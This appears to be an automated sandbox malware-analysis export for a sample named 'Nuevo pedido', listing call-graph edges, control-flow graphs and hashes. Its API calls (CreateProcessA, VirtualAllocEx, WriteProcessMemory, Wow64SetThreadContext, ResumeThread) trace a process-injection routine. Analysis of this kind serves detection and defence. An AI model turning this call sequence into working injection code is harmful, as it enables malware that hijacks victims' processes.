29035->29034 29036->29034 29037->29034 29038->29034 29039->29034 29040->29034 29041->29034 29042->29034 29043->29034 29044->29034 29045->29034 29046->29034 29047->29034 29048->29034 29049->29034 29050->29034 29052 2673774 29051->29052 29053 26737e9 29051->29053 29054 2673f25 4 API calls 29052->29054 29055 2673baf 2 API calls 29052->29055 29056 2673fce 2 API calls 29052->29056 29057 26741ca 2 API calls 29052->29057 29058 26742f7 4 API calls 29052->29058 29059 26744b7 4 API calls 29052->29059 29060 2674276 4 API calls 29052->29060 29061 2673d16 2 API calls 29052->29061 29062 26742b3 4 API calls 29052->29062 29063 2674352 4 API calls 29052->29063 29064 2674172 4 API calls 29052->29064 29065 2674531 4 API calls 29052->29065 29066 2673c11 2 API calls 29052->29066 29067 26737c6 29052->29067 29068 267453f 2 API calls 29052->29068 29069 2673b7f 2 API calls 29052->29069 29070 2674019 2 API calls 29052->29070 29053->28987 29054->29067 29055->29067 29056->29067 29057->29067 29058->29067 29059->29067 29060->29067 29061->29067 29062->29067 29063->29067 29064->29067 29065->29067 29066->29067 29067->28987 29068->29067 29069->29067 29070->29067 29072 2673f2b 29071->29072 29073 2674687 29072->29073 29167 26708b0 29072->29167 29171 26708a8 29072->29171 29175 6f3fba0 29072->29175 29179 6f3fb98 29072->29179 29073->28995 29079 267401f 29078->29079 29183 2670a40 29079->29183 29187 2670a48 29079->29187 29080 2674051 29080->28995 29085 2673b95 29083->29085 29084 2673ba1 29084->28995 29085->29084 29191 2670cd0 29085->29191 29195 2670cc4 29085->29195 29091 2670a40 WriteProcessMemory 29089->29091 29092 2670a48 WriteProcessMemory 29089->29092 29090 267456d 29091->29090 29092->29090 29094 2673bb3 29093->29094 29096 2670cc4 CreateProcessA 29094->29096 29097 2670cd0 CreateProcessA 29094->29097 29095 2673cd7 29095->29095 29096->29095 29097->29095 29099 2673f3c 29098->29099 29100 2674534 29098->29100 29101 2674687 29099->29101 29102 26708b0 Wow64SetThreadContext 29099->29102 29103 26708a8 Wow64SetThreadContext 29099->29103 29104 6f3fba0 ResumeThread 29099->29104 29105 6f3fb98 ResumeThread 29099->29105 29101->28995 29102->29099 29103->29099 29104->29099 29105->29099 29107 267418c 29106->29107 29108 2674051 29107->29108 29199 2670980 29107->29199 29203 2670988 29107->29203 29108->28995 29109 2674417 29109->28995 29110 2674030 29110->29109 29111 2670a40 WriteProcessMemory 29110->29111 29112 2670a48 WriteProcessMemory 29110->29112 29111->29108 29112->29108 29116 2673f3c 29115->29116 29117 2674687 29116->29117 29118 26708b0 Wow64SetThreadContext 29116->29118 29119 26708a8 Wow64SetThreadContext 29116->29119 29120 6f3fba0 ResumeThread 29116->29120 29121 6f3fb98 ResumeThread 29116->29121 29117->28995 29118->29116 29119->29116 29120->29116 29121->29116 29123 2673f3c 29122->29123 29123->29122 29124 2674687 29123->29124 29125 6f3fba0 ResumeThread 29123->29125 29126 6f3fb98 ResumeThread 29123->29126 29127 26708b0 Wow64SetThreadContext 29123->29127 29128 26708a8 Wow64SetThreadContext 29123->29128 29124->28995 29125->29123 29126->29123 29127->29123 29128->29123 29131 2670a40 WriteProcessMemory 29129->29131 29132 2670a48 WriteProcessMemory 29129->29132 29130 2673d02 29130->28995 29131->29130 29132->29130 29135 2673f3c 29133->29135 29134 2674687 29134->28995 29135->29134 29136 26708b0 Wow64SetThreadContext 29135->29136 29137 26708a8 Wow64SetThreadContext 29135->29137 29138 6f3fba0 ResumeThread 29135->29138 29139 6f3fb98 ResumeThread 29135->29139 29136->29135 29137->29135 29138->29135 29139->29135 29141 2673f3c 29140->29141 29142 2674687 29141->29142 29143 26708b0 Wow64SetThreadContext 29141->29143 29144 26708a8 Wow64SetThreadContext 29141->29144 29145 6f3fba0 ResumeThread 29141->29145 29146 6f3fb98 ResumeThread 29141->29146 29142->28995 29143->29141 29144->29141 29145->29141 29146->29141 29149 2673f3c 29147->29149 29148 2674687 29148->28995 29149->29148 29150 26708b0 Wow64SetThreadContext 29149->29150 29151 26708a8 Wow64SetThreadContext 29149->29151 29152 6f3fba0 ResumeThread 29149->29152 29153 6f3fb98 ResumeThread 29149->29153 29150->29149 29151->29149 29152->29149 29153->29149 29156 26708b0 Wow64SetThreadContext 29154->29156 29157 26708a8 Wow64SetThreadContext 29154->29157 29155 26741e4 29156->29155 29157->29155 29207 2670b30 29158->29207 29211 2670b38 29158->29211 29159 2673ffa 29163 2673c37 29162->29163 29165 2670cc4 CreateProcessA 29163->29165 29166 2670cd0 CreateProcessA 29163->29166 29164 2673cd7 29165->29164 29166->29164 29168 26708f5 Wow64SetThreadContext 29167->29168 29170 267093d 29168->29170 29170->29072 29172 26708b0 Wow64SetThreadContext 29171->29172 29174 267093d 29172->29174 29174->29072 29176 6f3fbe0 ResumeThread 29175->29176 29178 6f3fc11 29176->29178 29178->29072 29180 6f3fb9b ResumeThread 29179->29180 29182 6f3fc11 29180->29182 29182->29072 29184 2670a43 WriteProcessMemory 29183->29184 29186 2670ae7 29184->29186 29186->29080 29188 2670a90 WriteProcessMemory 29187->29188 29190 2670ae7 29188->29190 29190->29080 29192 2670d59 CreateProcessA 29191->29192 29194 2670f1b 29192->29194 29196 2670cd0 CreateProcessA 29195->29196 29198 2670f1b 29196->29198 29200 2670983 VirtualAllocEx 29199->29200 29202 2670a05 29200->29202 29202->29110 29204 26709bb VirtualAllocEx 29203->29204 29206 2670a05 29204->29206 29206->29110 29208 2670b38 ReadProcessMemory 29207->29208 29210 2670bc7 29208->29210 29210->29159 29212 2670b83 ReadProcessMemory 29211->29212 29214 2670bc7 29212->29214 29214->29159 28943 2754668 28944 275467a 28943->28944 28945 2754686 28944->28945 28947 2754779 28944->28947 28948 275479d 28947->28948 28952 2754879 28948->28952 28956 2754888 28948->28956 28953 2754888 28952->28953 28954 275498c 28953->28954 28960 27544c4 28953->28960 28958 27548af 28956->28958 28957 275498c 28957->28957 28958->28957 28959 27544c4 CreateActCtxA 28958->28959 28959->28957 28961 2755918 CreateActCtxA 28960->28961 28963 27559db 28961->28963 28966 2674a08 28967 2674b93 28966->28967 28968 2674a2e 28966->28968 28968->28967 28971 2674c80 28968->28971 28974 2674c88 PostMessageW 28968->28974 28972 2674c88 PostMessageW 28971->28972 28973 2674cf4 28972->28973 28973->28968 28975 2674cf4 28974->28975 28975->28968

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 395 6f30d8a-6f30d8c 396 6f30d8e-6f30d9b 395->396 397 6f30e0d-6f30e64 395->397 396->397 398 6f30e71-6f30e90 397->398 399 6f30e66-6f30e68 397->399 400 6f30e92 398->400 401 6f30e94-6f30ef9 398->401 402 6f30e6a-6f30e6c 399->402 403 6f30e6f-6f30e70 399->403 400->401 405 6f30efb-6f30f25 401->405 406 6f30f2c-6f30f68 401->406 402->403 403->398 405->406 408 6f30f27 405->408 475 6f30f6a call 6f314a3 406->475 476 6f30f6a call 6f314b0 406->476 408->406 410 6f30f70-6f30f72 411 6f30f75 410->411 412 6f30f7c-6f30f98 411->412 413 6f30fa1-6f30fa2 412->413 414 6f30f9a 412->414 418 6f312d9-6f312e0 413->418 428 6f30fa7-6f30fcc 413->428 414->411 415 6f310b2-6f310b6 414->415 416 6f31116-6f31123 414->416 417 6f30ff6-6f31022 414->417 414->418 419 6f31158-6f3115c 414->419 420 6f31058-6f31078 414->420 421 6f3121e-6f3122a 414->421 422 6f3103e-6f31053 414->422 423 6f3107d-6f31086 414->423 424 6f31202-6f31219 414->424 425 6f30fe2-6f30ff4 414->425 426 6f310e2-6f310ee 414->426 427 6f311a1-6f311ad 414->427 414->428 429 6f31027-6f31039 414->429 430 6f311cb-6f311d7 414->430 431 6f31188-6f3119c 414->431 432 6f31128-6f3112c 414->432 433 6f30fce-6f30fe0 414->433 434 6f312ac-6f312b8 414->434 439 6f310c9-6f310d0 415->439 440 6f310b8-6f310c7 415->440 416->412 417->412 445 6f3116f-6f31176 419->445 446 6f3115e-6f3116d 419->446 420->412 437 6f31231-6f31247 421->437 438 6f3122c 421->438 422->412 435 6f31099-6f310a0 423->435 436 6f31088-6f31097 423->436 424->412 425->412 441 6f310f0 426->441 442 6f310f5-6f31111 426->442 447 6f311b4-6f311c6 427->447 448 6f311af 427->448 428->412 429->412 451 6f311d9 430->451 452 6f311de-6f311fd 430->452 431->412 443 6f3113f-6f31146 432->443 444 6f3112e-6f3113d 432->444 433->412 449 6f312ba 434->449 450 6f312bf-6f312d4 434->450 453 6f310a7-6f310ad 435->453 436->453 465 6f31249 437->465 466 6f3124e-6f31264 437->466 438->437 455 6f310d7-6f310dd 439->455 440->455 441->442 442->412 454 6f3114d-6f31153 443->454 444->454 456 6f3117d-6f31183 445->456 446->456 447->412 448->447 449->450 450->412 451->452 452->412 453->412 454->412 455->412 456->412 465->466 469 6f31266 466->469 470 6f3126b-6f31281 466->470 469->470 472 6f31283 470->472 473 6f31288-6f312a7 470->473 472->473 473->412 475->410 476->410
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 0%p1$0%p1$0%p1
                                                                                                                                            • API String ID: 0-1740658550
                                                                                                                                            • Opcode ID: 90dbb7a3f7c4b15295c1903c4ab932481583d57c8606cc90e0bf6b19c7183411
                                                                                                                                            • Instruction ID: dc6734e19a17b787526db3629f1590b0463e675b17d6cb69d2dbb095ab7859e3
                                                                                                                                            • Opcode Fuzzy Hash: 90dbb7a3f7c4b15295c1903c4ab932481583d57c8606cc90e0bf6b19c7183411
                                                                                                                                            • Instruction Fuzzy Hash: 1BE1CF75E01216DFCB44CFA9D8818AFFBB6FF89340B10855AE401AB214DB349A42CFE5

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 477 6f30e10-6f30e64 478 6f30e71-6f30e90 477->478 479 6f30e66-6f30e68 477->479 480 6f30e92 478->480 481 6f30e94-6f30ef9 478->481 482 6f30e6a-6f30e6c 479->482 483 6f30e6f-6f30e70 479->483 480->481 485 6f30efb-6f30f25 481->485 486 6f30f2c-6f30f68 481->486 482->483 483->478 485->486 488 6f30f27 485->488 555 6f30f6a call 6f314a3 486->555 556 6f30f6a call 6f314b0 486->556 488->486 490 6f30f70-6f30f72 491 6f30f75 490->491 492 6f30f7c-6f30f98 491->492 493 6f30fa1-6f30fa2 492->493 494 6f30f9a 492->494 498 6f312d9-6f312e0 493->498 508 6f30fa7-6f30fcc 493->508 494->491 495 6f310b2-6f310b6 494->495 496 6f31116-6f31123 494->496 497 6f30ff6-6f31022 494->497 494->498 499 6f31158-6f3115c 494->499 500 6f31058-6f31078 494->500 501 6f3121e-6f3122a 494->501 502 6f3103e-6f31053 494->502 503 6f3107d-6f31086 494->503 504 6f31202-6f31219 494->504 505 6f30fe2-6f30ff4 494->505 506 6f310e2-6f310ee 494->506 507 6f311a1-6f311ad 494->507 494->508 509 6f31027-6f31039 494->509 510 6f311cb-6f311d7 494->510 511 6f31188-6f3119c 494->511 512 6f31128-6f3112c 494->512 513 6f30fce-6f30fe0 494->513 514 6f312ac-6f312b8 494->514 519 6f310c9-6f310d0 495->519 520 6f310b8-6f310c7 495->520 496->492 497->492 525 6f3116f-6f31176 499->525 526 6f3115e-6f3116d 499->526 500->492 517 6f31231-6f31247 501->517 518 6f3122c 501->518 502->492 515 6f31099-6f310a0 503->515 516 6f31088-6f31097 503->516 504->492 505->492 521 6f310f0 506->521 522 6f310f5-6f31111 506->522 527 6f311b4-6f311c6 507->527 528 6f311af 507->528 508->492 509->492 531 6f311d9 510->531 532 6f311de-6f311fd 510->532 511->492 523 6f3113f-6f31146 512->523 524 6f3112e-6f3113d 512->524 513->492 529 6f312ba 514->529 530 6f312bf-6f312d4 514->530 533 6f310a7-6f310ad 515->533 516->533 545 6f31249 517->545 546 6f3124e-6f31264 517->546 518->517 535 6f310d7-6f310dd 519->535 520->535 521->522 522->492 534 6f3114d-6f31153 523->534 524->534 536 6f3117d-6f31183 525->536 526->536 527->492 528->527 529->530 530->492 531->532 532->492 533->492 534->492 535->492 536->492 545->546 549 6f31266 546->549 550 6f3126b-6f31281 546->550 549->550 552 6f31283 550->552 553 6f31288-6f312a7 550->553 552->553 553->492 555->490 556->490
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 0%p1$0%p1$0%p1
                                                                                                                                            • API String ID: 0-1740658550
                                                                                                                                            • Opcode ID: 71b0e2076394b2446aa3657779dfbaf3c303ebb7b590f31cda6d42c75e99373c
                                                                                                                                            • Instruction ID: e623d506ef01951fee4ebe600026c62b2579145df41330583613443874a194eb
                                                                                                                                            • Opcode Fuzzy Hash: 71b0e2076394b2446aa3657779dfbaf3c303ebb7b590f31cda6d42c75e99373c
                                                                                                                                            • Instruction Fuzzy Hash: 07E19E75D0121ADFCB44CFA9D8818AFFBB6FF89340B10955AE401AB254DB349A42CFE5

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 557 6f30f00-6f30f25 558 6f30f27 557->558 559 6f30f2c-6f30f68 557->559 558->559 626 6f30f6a call 6f314a3 559->626 627 6f30f6a call 6f314b0 559->627 561 6f30f70-6f30f72 562 6f30f75 561->562 563 6f30f7c-6f30f98 562->563 564 6f30fa1-6f30fa2 563->564 565 6f30f9a 563->565 569 6f312d9-6f312e0 564->569 579 6f30fa7-6f30fcc 564->579 565->562 566 6f310b2-6f310b6 565->566 567 6f31116-6f31123 565->567 568 6f30ff6-6f31022 565->568 565->569 570 6f31158-6f3115c 565->570 571 6f31058-6f31078 565->571 572 6f3121e-6f3122a 565->572 573 6f3103e-6f31053 565->573 574 6f3107d-6f31086 565->574 575 6f31202-6f31219 565->575 576 6f30fe2-6f30ff4 565->576 577 6f310e2-6f310ee 565->577 578 6f311a1-6f311ad 565->578 565->579 580 6f31027-6f31039 565->580 581 6f311cb-6f311d7 565->581 582 6f31188-6f3119c 565->582 583 6f31128-6f3112c 565->583 584 6f30fce-6f30fe0 565->584 585 6f312ac-6f312b8 565->585 590 6f310c9-6f310d0 566->590 591 6f310b8-6f310c7 566->591 567->563 568->563 596 6f3116f-6f31176 570->596 597 6f3115e-6f3116d 570->597 571->563 588 6f31231-6f31247 572->588 589 6f3122c 572->589 573->563 586 6f31099-6f310a0 574->586 587 6f31088-6f31097 574->587 575->563 576->563 592 6f310f0 577->592 593 6f310f5-6f31111 577->593 598 6f311b4-6f311c6 578->598 599 6f311af 578->599 579->563 580->563 602 6f311d9 581->602 603 6f311de-6f311fd 581->603 582->563 594 6f3113f-6f31146 583->594 595 6f3112e-6f3113d 583->595 584->563 600 6f312ba 585->600 601 6f312bf-6f312d4 585->601 604 6f310a7-6f310ad 586->604 587->604 616 6f31249 588->616 617 6f3124e-6f31264 588->617 589->588 606 6f310d7-6f310dd 590->606 591->606 592->593 593->563 605 6f3114d-6f31153 594->605 595->605 607 6f3117d-6f31183 596->607 597->607 598->563 599->598 600->601 601->563 602->603 603->563 604->563 605->563 606->563 607->563 616->617 620 6f31266 617->620 621 6f3126b-6f31281 617->621 620->621 623 6f31283 621->623 624 6f31288-6f312a7 621->624 623->624 624->563 626->561 627->561
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 0%p1$0%p1$0%p1
                                                                                                                                            • API String ID: 0-1740658550
                                                                                                                                            • Opcode ID: 6d81c37e55e274b4a60b91b8d32ee8c9bb20365c31f192cca6a5343e02535076
                                                                                                                                            • Instruction ID: 7ef5899ad56fc8e4a96b9b1aee058014c1f7fb82fb75872ebeb3adbc8248068f
                                                                                                                                            • Opcode Fuzzy Hash: 6d81c37e55e274b4a60b91b8d32ee8c9bb20365c31f192cca6a5343e02535076
                                                                                                                                            • Instruction Fuzzy Hash: 75C17D75E0421ACFCB44CFA9D5818AEFBB2FF89340B14D55AE405AB354DB34A982CF94
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 7{f'
                                                                                                                                            • API String ID: 0-2192695807
                                                                                                                                            • Opcode ID: 2c93380a0bd0ecc19c2937e67079b34a684345199a1a05c05150446d9501bfec
                                                                                                                                            • Instruction ID: 516387221121860421703be38391568bb7bc7404b021b02d59c672da55b029f3
                                                                                                                                            • Opcode Fuzzy Hash: 2c93380a0bd0ecc19c2937e67079b34a684345199a1a05c05150446d9501bfec
                                                                                                                                            • Instruction Fuzzy Hash: 03A11771E1A219DFDB84CFA5DA8499DFBF2EF8A300F20A41AD406BB254D73499058F54
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 7{f'
                                                                                                                                            • API String ID: 0-2192695807
                                                                                                                                            • Opcode ID: fc143e1273f491cb9384ca19229691b5011571029498816ab6bb76cdffe3f417
                                                                                                                                            • Instruction ID: a2be8ad98b7ce9d1c52c59e6c0105866a534630945d69177dc5ae9acefc4985e
                                                                                                                                            • Opcode Fuzzy Hash: fc143e1273f491cb9384ca19229691b5011571029498816ab6bb76cdffe3f417
                                                                                                                                            • Instruction Fuzzy Hash: 31A13871E16219DFDB44CFA5DA8499DFBF2EF89300F20A42AE406BB254D7349905CF54
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Z
                                                                                                                                            • API String ID: 0-1862792848
                                                                                                                                            • Opcode ID: 8daaf255de42c1068865163ea29ba7da4b752bb92bcc0987722ddd2a10eca548
                                                                                                                                            • Instruction ID: bfa7b390ab879922a8116cf833ea6bf04d5961da52209fb58d91624702be562c
                                                                                                                                            • Opcode Fuzzy Hash: 8daaf255de42c1068865163ea29ba7da4b752bb92bcc0987722ddd2a10eca548
                                                                                                                                            • Instruction Fuzzy Hash: 4A913775E00229CFDB44CFA9D9409EEFBB2FF88200F10956AD825B7258D7359902CF98
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Z
                                                                                                                                            • API String ID: 0-1862792848
                                                                                                                                            • Opcode ID: 108b6b4a366ba0dd92255ec21e47645d761e0e80c200cec0c3bca91bffe7c9b0
                                                                                                                                            • Instruction ID: bdcc4e5f635bf896cc09dfa4980d4ce046afebf09bbb8a59b5a6bc431693b07c
                                                                                                                                            • Opcode Fuzzy Hash: 108b6b4a366ba0dd92255ec21e47645d761e0e80c200cec0c3bca91bffe7c9b0
                                                                                                                                            • Instruction Fuzzy Hash: 3A813575E01229CFDB44CFA9D9849EEFBB2FF88200F10956AD825B7258D7359902CF94
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d51fe4a5315ef055c2c36ce3f6896e3d75ac8a4073939ea2b0e86c29343bc254
                                                                                                                                            • Instruction ID: b0594aa60ecdcf1ce23966c029cc9af6c8575ad5bc35b7a1d511f20af7ecb134
                                                                                                                                            • Opcode Fuzzy Hash: d51fe4a5315ef055c2c36ce3f6896e3d75ac8a4073939ea2b0e86c29343bc254
                                                                                                                                            • Instruction Fuzzy Hash: 2441D175E10608EFD748CFAAE58489DFBF2FF89200F59D0A5D458AB365EB319A118B04
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 882b4c4d59c308d24b8f8e0ac57317a42d9338d59caed8472aa87725aaa73e2b
                                                                                                                                            • Instruction ID: b8eb4ba425b5eca77223fa8182ede942f1e69ad5ef2367770c0843354028756a
                                                                                                                                            • Opcode Fuzzy Hash: 882b4c4d59c308d24b8f8e0ac57317a42d9338d59caed8472aa87725aaa73e2b
                                                                                                                                            • Instruction Fuzzy Hash: 7C41D275E10508EFD748CFAAE58499DFBF2FF89200F19D0A9D458AB365EB319A118B04
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a191a2e6d12a9916da9fa5d26cd5be77d53d434453bb78c790fff709ef1d64f2
                                                                                                                                            • Instruction ID: 0599a985cd0bf35144d769a8597f6782bc29b571761e02cb7384a81ca45d7ba8
                                                                                                                                            • Opcode Fuzzy Hash: a191a2e6d12a9916da9fa5d26cd5be77d53d434453bb78c790fff709ef1d64f2
                                                                                                                                            • Instruction Fuzzy Hash: 22316DB1D057988FDB59CFA6C8443DABFB3AF86300F18C0AAD404AB265DB340945CB60
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ad4b97f3abb632e18b7a340ea79e5d523029110b094ba0999ea4cb42c92aa002
                                                                                                                                            • Instruction ID: 54f63b7652d92a5886d053567f51791c426046a35633d85f79300ea13c8f1aa3
                                                                                                                                            • Opcode Fuzzy Hash: ad4b97f3abb632e18b7a340ea79e5d523029110b094ba0999ea4cb42c92aa002
                                                                                                                                            • Instruction Fuzzy Hash: 662118B1E006189BDB58CFABD8442DEFBF3AFC8310F14C16AD408A6268DB741A45CF50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5ba7ed809b98d1f50345e943c1bdc8293f67f23c48b737aa12cfcfd2ffcd56e5
                                                                                                                                            • Instruction ID: 32c6ba11bd9bf2c626125082d11a05f2aed64ad296452d0c9147683a55b0346e
                                                                                                                                            • Opcode Fuzzy Hash: 5ba7ed809b98d1f50345e943c1bdc8293f67f23c48b737aa12cfcfd2ffcd56e5
                                                                                                                                            • Instruction Fuzzy Hash: 2FD01274C0E104CFD304DF64A5585F876B89B07241F1820DA510E97202D5704842CE15
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a6ab17784f342a1830836d078ce509cac20b790a6fa4d6082b813d95bfc164d2
                                                                                                                                            • Instruction ID: c51b115a1d3a147b62befec1149c103ad586f08f2a6d7af55b94b9abc6752bcc
                                                                                                                                            • Opcode Fuzzy Hash: a6ab17784f342a1830836d078ce509cac20b790a6fa4d6082b813d95bfc164d2
                                                                                                                                            • Instruction Fuzzy Hash: 5BA00200C8E405C09608EE1031440B9F17D460B281E203989900E332020C10C053E81D

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 294 275d031-275d0cf GetCurrentProcess 298 275d0d1-275d0d7 294->298 299 275d0d8-275d10c GetCurrentThread 294->299 298->299 300 275d115-275d149 GetCurrentProcess 299->300 301 275d10e-275d114 299->301 303 275d152-275d16d call 275d618 300->303 304 275d14b-275d151 300->304 301->300 306 275d173-275d1a2 GetCurrentThreadId 303->306 304->303 308 275d1a4-275d1aa 306->308 309 275d1ab-275d20d 306->309 308->309
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0275D0BE
                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0275D0FB
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0275D138
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0275D191
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1729322384.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2750000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2063062207-0
                                                                                                                                            • Opcode ID: 73ee7ee62c01c85d78778ca26c955edcf85fb7261090945eeba0a67c40914fb8
                                                                                                                                            • Instruction ID: b954724418a232ca924a50b2892d09bb1a9a94a47743dec9c60a435c0366fbc1
                                                                                                                                            • Opcode Fuzzy Hash: 73ee7ee62c01c85d78778ca26c955edcf85fb7261090945eeba0a67c40914fb8
                                                                                                                                            • Instruction Fuzzy Hash: 775166B49002498FDB14DFA9D548BDEFBF1EF88308F208469E419A7360DB75A944CF66

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 316 275d040-275d0cf GetCurrentProcess 320 275d0d1-275d0d7 316->320 321 275d0d8-275d10c GetCurrentThread 316->321 320->321 322 275d115-275d149 GetCurrentProcess 321->322 323 275d10e-275d114 321->323 325 275d152-275d16d call 275d618 322->325 326 275d14b-275d151 322->326 323->322 328 275d173-275d1a2 GetCurrentThreadId 325->328 326->325 330 275d1a4-275d1aa 328->330 331 275d1ab-275d20d 328->331 330->331
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0275D0BE
                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0275D0FB
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0275D138
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0275D191
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1729322384.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2750000_Nuevo pedido.jbxd
